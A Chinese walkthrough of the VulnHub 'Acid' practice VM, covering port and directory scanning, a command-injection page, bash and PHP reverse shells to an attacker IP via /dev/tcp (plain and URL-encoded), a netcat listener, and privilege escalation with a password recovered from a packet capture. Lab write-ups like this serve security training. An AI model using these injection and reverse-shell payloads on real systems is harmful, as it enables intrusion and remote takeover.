VulnHub-Acid(1/100)

 参考链接:

​​​​​​​【VulnHub】Acid靶场复盘-CSDN博客

靶场渗透(二)——Acid渗透_ambassador 靶场渗透-CSDN博客

网络安全从0到0.5之Acid靶机实战渗透测试 | CN-SEC 中文网

Vulnhub靶场渗透练习(四) Acid - 紅人 - 博客园

红日团队笔记

信息收集

主机:kali,靶机:Acid

下载地址:https://download.vulnhub.com/acid/Acid.rar

扫描网段:arp-scan -l

扫描端口:

nmap -A -p- -sV 192.168.91.146(扫描全部端口)

开放端口33447,底层服务:Apache2.4.10,操作系统:Ubuntu

192.168.91.146:33447访问

dirb爆破目录,其实是没有有效结果的

查看页面源代码

转码两次后获得wow.jpg

访问路径,获取图片

在editor中发现一串数字,放入十六进制转换为ascii码

7aee0f6d588ed9905ee37f16a7c610d4,32位大概率为md5

解密为63425

最后发现没啥用

爆破目录

使用dirbuster爆破目录,用small字典,爆破提示的Challenge

目录下存在index.php,error.php,cake.php,include.php,hacked.php

或者直接使用dirb调用字典

使用-x参数,爆破.php文件,用big字典

dirb http://192.168.91.146:33447/Challenge /usr/share/wordlists/dirb/big.txt -X .php

渗透测试

访问cake.php,标题提示含有Magic_Box目录,爆破目录

http://192.168.91.146:33447/Challenge/cake.php/Magic_Box

这里需要多尝试 一下,/Challenge/Magic_Box,从这个位置开始访问。

命令执行

这个ip地址可以爆破出一个页面,进行命令执行

127.0.0.1;cat /etc/passwd,存在命令执行漏洞

进行命令执行测试,寻找默认密码

访问include.php,存在文件包含漏洞

转包,进行URL编码,/变为%2F,实现文件包含

关注地址为:/bin/bash

漏洞利用

使用通过URL编码的命令进行bash反弹,这里ip为攻击机(kali)的地址

bash反弹,单引号和双引号好像都行

bash -c:运行后面的字符串作为 Bash 命令。 'bash -i >& /dev/tcp/192.168.91.138/6666 0>&1':这是要执行的 Bash 命令。它包含以下几个部分: bash -i:启动一个交互式的 Bash shell。 -i 选项表示交互式。 >& /dev/tcp/192.168.91.138/6666:将标准输出和标准错误重定向到指定的 IP 地址和端口。 /dev/tcp 是一个特殊的设备文件,Bash 可以将其视为网络套接字。 0>&1:将标准输入重定向到标准输出。这样,我们就可以在远程主机上执行命令并获取输出。 此命令的目的是将被攻击主机上的 Bash shell 与指定 IP 地址和端口上的远程主机建立连接,使攻击者能够通过该连接远程控制被攻击主机并执行命令。

bash -c 'bash -i >& /dev/tcp/192.168.217.130/6666 0>&1'

127.0.0.1; bash -i >& /dev/tcp/192.168.217.130/6666 0>&1

bash -i >& /dev/tcp/192.168.217.130/6666 0>&1

php反弹:

php -r '$sock=fsockopen("192.168.91.138",6666);exec("/bin/bash -i &3 2>&3");'

直接在burpsuite里进行调整,点击encode,到URL

127.0.0.1|%62%61%73%68%20%2d%63%20%27%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%31%39%32%2e%31%36%38%2e%39%31%2e%31%33%38%2f%36%36%36%36%20%30%3e%26%31%27

192.168.217.130

监听

nc -lvp 6666

成功上线

权限提升

进行提权

这里是su执行,必须需要一个终端

python导入交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

cat /etc/passwd

查看用户名,

acif、saman、root为:/bin/bash

/tmp存放临时文件

/tmp$ ls /home 出现用户

这里应该是直接到home目录查看

前面已经获取了密码

查找acid用户创建的文件(不显示错误)

find:一个用于搜索文件和目录的常用命令。 /:表示要搜索的起始路径,这里是根目录。 -user acid:指定只搜索由用户"acid"创建的文件和目录。 2>/dev/null:将标准错误输出重定向到

/dev/null,即丢弃错误信息,避免出现权限错误提示。

find / -user acid 2>/dev/null

出现了一个流量包

方法一:

先进到/home,再cd到/sbin

python -m SimpleHTTPServer 8080

出现文件,下载分析

tcp.stream只看tcp协议的包

发现用户密码1337hax0r

进行提权

当前用户有 sudo 权限,想切换到 root

先切换到saman

www-data@acid:/var/www/html/Challenge/Magic_Box$ su samansu samanPassword: 1337hax0r

需要的是当前用户的密码

sudo -i

查看当前用户的权限情况

su权限过高,直接提权到root

这里不能直接su root,并不知道root密码

使用

sudo -l

只需要当前用户的密码

得到flag

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/bicheng/66435.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

51c自动驾驶~合集45

我自己的原文哦~ https://blog.51cto.com/whaosoft/13020031 #运动控制和规划控制需要掌握的技术栈~ 各大垃圾家电造车厂又要开始了~~~​ 1、ROS的通信方式 李是Lyapunov的李:谈谈ROS的通信机制 话题通信和服务通信,其中话题通信是通过发布和订阅…

Debian、Ubuntu 22.04和ubuntu 24.04国内镜像源(包括 docker 源)

Debian 更换国内清华源 1、备份原文件mv /etc/apt/sources.list /etc/apt/sources.list.old 2、写入新源&#xff0c;以下是 Debian 11 的&#xff1a; cat > /etc/apt/sources.list << EOF deb https://mirrors.tuna.tsinghua.edu.cn/debian/ bullseye main contrib…

【Unity3D】AB包加密(AssetBundle加密)

加密前&#xff1a; 加密后&#xff0c;直接无法加载ab&#xff0c;所以无法正常看到ab内容。 using UnityEngine; using UnityEditor; using System.IO; public static class AssetBundleDemoTest {[MenuItem("Tools/打包!")]public static void Build(){//注意:St…

平面坐标转大地坐标(arcgisPro中进行)

1、将需要转换的红线导入arcgisPro中&#xff0c;如下&#xff1a; 2、在地图菜单栏中&#xff0c;选择坐标转换工具&#xff0c;如下&#xff1a; 3、打开坐标转换工具 4、开启捕捉 5、 设置大地坐标显示格式 6、如下&#xff1a; 7、显示如图&#xff1a; 8、再依次添加几个待…

Python 在PDF中添加数字签名

在数字化时代&#xff0c;文件的安全性和可信度变得尤为重要。无论是商业文件、法律文件还是个人文件&#xff0c;都可能需要证明其来源的真实性和完整性。PDF数字签名就是解决这些问题的关键工具。PDF数字签名不仅能够确保文件的安全性&#xff0c;还能提高工作效率&#xff0…

Mysql--基础篇--函数(字符串函数,日期函数,数值函数,聚合函数,自定义函数及与存储过程的区别等)

MySQL提供了丰富的内置函数&#xff0c;涵盖了字符串处理、数值计算、日期和时间操作、聚合统计、控制流等多种功能。这些函数可以帮助你简化SQL查询&#xff0c;提升开发效率。 除了内置函数&#xff0c;MySQL还支持自定义函数&#xff08;User-Defined Functions&#xff09;…

《 小A点菜》

题目背景 uim 神犇拿到了 uoi 的 ra&#xff08;镭牌&#xff09;后&#xff0c;立刻拉着基友小 A 到了一家……餐馆&#xff0c;很低端的那种。 uim 指着墙上的价目表&#xff08;太低级了没有菜单&#xff09;&#xff0c;说&#xff1a;“随便点”。 题目描述 不过 uim …

.net core 为什么使用 null!

为什么使用 null!&#xff1f; 通常在以下几种情况中&#xff0c;你可能会使用 null!&#xff1a; 属性值可能会在对象构造或某个方法中被初始化&#xff0c;但在构造函数或者对象完全初始化之前&#xff0c;属性的值可能会是 null。你知道这个属性最终会被赋一个非 null 的值…

STM32学习(十)

I2C模块内部结构 I2C&#xff08;Inter-Integrated Circuit&#xff09;模块是一种由Philips公司开发的二线式串行总线协议&#xff0c;用于短距离通信&#xff0c;允许多个设备共享相同的总线‌。 ‌硬件连接简单‌&#xff1a;I2C通信仅需要两条总线&#xff0c;即SCL&…

使用 Rust 实现零拷贝数据处理:性能优化的极致探索

随着大数据处理需求的不断增长&#xff0c;数据处理框架需要高效的内存管理能力以提升吞吐量与降低延迟。在本文中&#xff0c;我们将探索 Rust 语言如何利用零拷贝&#xff08;Zero-Copy&#xff09;的特性来构建高效的数据处理系统。这一技术尽管强大&#xff0c;但由于它对内…

Oracle job(定时任务)

1、job的作用 可以定时执行任务&#xff08;分/次、时/次、天/次等&#xff09; 2、创建job --创建job --注意点&#xff1a; --①job_no 为系统自动获取&#xff1b; --②存储过程名需要加‘&#xff1b;’ --③定时器开始执行时间可以填‘sysdate,表示立即执行 --④执行频…

nginx配置 - 资源参数配置(性能优化)

nginx - 资源参数配置 (性能优化) 一、worker_rilimit_nofile配置的含义使用场景如何调整参数系统级文件描述符限制(补充)二、worker_connections三、两者之间的数值关系四、sendfile五、keepalive_timeout本文重点讨论: 最大文件描述符数量 worker_rilimit_nofile和最大连…

iOS - 引用计数(ARC)

1. 基本数据结构 // 对象结构 struct objc_object {isa_t isa; // isa 指针&#xff0c;包含引用计数信息 };// isa 的位域结构 union isa_t {uintptr_t bits;struct {uintptr_t nonpointer : 1; // 是否启用优化的 isa 指针uintptr_t has_assoc : 1; // 是…

尚硅谷· vue3+ts 知识点学习整理 |14h的课程(持续更ing)

vue3 主要内容 核心&#xff1a;ref、reactive、computed、watch、生命周期 常用&#xff1a;hooks、自定义ref、路由、pinia、miit 面试&#xff1a;组件通信、响应式相关api ----> 笔记&#xff1a;ts快速梳理&#xff1b;vue3快速上手.pdf 笔记及大纲 如下&#xff…

【Ubuntu20.04】Apollo10.0 Docker容器部署+常见错误解决

官方参考文档【点击我】 Apollo 10.0 版本开始&#xff0c;支持本机和Docker容器两种部署方式。 如果您使用本机部署方式&#xff0c;建议使用x86_64架构的Ubuntu 22.04操作系统或者aarch64架构的Ubuntu 20.04操作系统。 如果您使用Docker容器部署方式&#xff0c;可以使用x…

安卓14无法安装应用解决历程

客户手机基本情况&#xff1a; 安卓14&#xff0c;对应的 targetSdkVersion 34 前天遇到了安卓14适配问题&#xff0c;客户发来的截图是这样的 描述&#xff1a;无法安装我们公司的B应用。 型号&#xff1a;三星google美版 解决步骤&#xff1a; 1、寻找其他安卓14手机测试…

利用 NineData 实现 PostgreSQL 到 Kafka 的高效数据同步

记录一次 PostgreSQL 到 Kafka 的数据迁移实践。前段时间&#xff0c;NineData 的某个客户在一个项目中需要将 PostgreSQL 的数据实时同步到 Kafka。需求明确且普遍&#xff1a; PostgreSQL 中的交易数据&#xff0c;需要实时推送到 Kafka&#xff0c;供下游多个系统消费&#…

Zookeeper是如何保证事务的顺序一致性的?

大家好&#xff0c;我是锋哥。今天分享关于【Zookeeper是如何保证事务的顺序一致性的?】面试题。希望对大家有帮助&#xff1b; Zookeeper是如何保证事务的顺序一致性的? 1000道 互联网大厂Java工程师 精选面试题-Java资源分享网 Zookeeper 通过多个机制来保证事务的顺序一…

电脑如何无线控制手机?

想在电脑上无线控制手机&#xff0c;需要用到Total Control控制软件&#xff0c;具体步骤如下&#xff1a; 1、首先我们在电脑上安装上控制软件Total Control并打开。 2、开启手机USB调试和ADB仅充电模式。 3、手机电脑均连接上相同局域网。 4、连接(首次使用需要用手机U…

内网穿透的应用-自托管文件分享系统PicoShare搭建流程与远程共享实战教程

文章目录 前言1. 本地安装Docker2. 本地部署PicoShare3. 如何使用PicoShare4. 公网远程访问本地 PicoShare4.1 内网穿透工具安装4.2 创建远程连接公网地址 5. 固定PicoShare公网地址 前言 大家好&#xff01;在数字化时代&#xff0c;文件共享变得越来越重要&#xff0c;尤其是…